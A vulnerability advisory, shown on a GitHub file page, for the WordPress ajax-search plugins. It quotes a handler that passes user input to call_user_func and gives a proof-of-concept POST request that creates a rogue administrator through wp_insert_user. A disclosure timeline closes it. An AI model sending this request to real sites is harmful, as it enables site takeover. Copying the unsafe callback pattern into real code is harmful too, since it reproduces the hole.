-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathajax-search-pro & ajax-search-lite.txt
33 lines (26 loc) · 1.35 KB
/
ajax-search-pro & ajax-search-lite.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
WordPress ajax-search-pro Plugin Remote Code Execution
[-] Plugin Link:
http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410
also affected:
https://wordpress.org/plugins/ajax-search-lite/ https://wordpress.org/plugins/related-posts-lite/
[-] Vulnerability Description:
This vulnerability allows any registered user to execute arbitrary functions
vulnerability code:
add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
function wpdreams_ajaxinputcallback() {
$param = $_POST;
echo call_user_func($_POST['wpdreams_callback'], $param);
exit;
}
}
this will allow any registered user to execute any function he wants with 1st param set to array($_POST)
since wordpress core provides some functions that accept 1st param as an array then,wp_insert_user have a role option for the user you are inserting, this option can insert a new administrator
[-] Proof of Concept:
this will register an administrator with username "xADMIN" and password "xPASS"
url: http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinputpost
data: wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
[-] Timeline:
09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure